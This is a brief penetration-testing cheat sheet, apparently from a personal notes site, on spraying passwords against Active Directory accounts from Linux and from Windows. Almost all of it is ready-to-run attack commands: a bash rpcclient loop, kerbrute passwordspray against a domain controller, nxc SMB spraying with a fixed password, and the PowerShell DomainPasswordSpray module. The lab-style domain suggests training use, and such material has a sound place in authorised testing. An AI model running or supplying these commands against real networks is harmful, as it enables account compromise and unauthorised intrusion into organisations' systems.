githubEdit

password-spraying-

Internal password spray attack (from linux)

rpcclient (bash one-linear)

for u in $(cat valid_users.txt);do rpcclient -U "$u%Weasal" -c "getusername;quit" <dc_ip> | grep Authority; done

Kerbrute

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt  Welcome1

Crackmapexec

sudo nxc smb <dc_ip> -u valid_users.txt -p Password123 | grep +

Internal password spraying (from windows)

DomainPasswordSpray

DomainPasswordSprayarrow-up-right

Import-module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

Last updated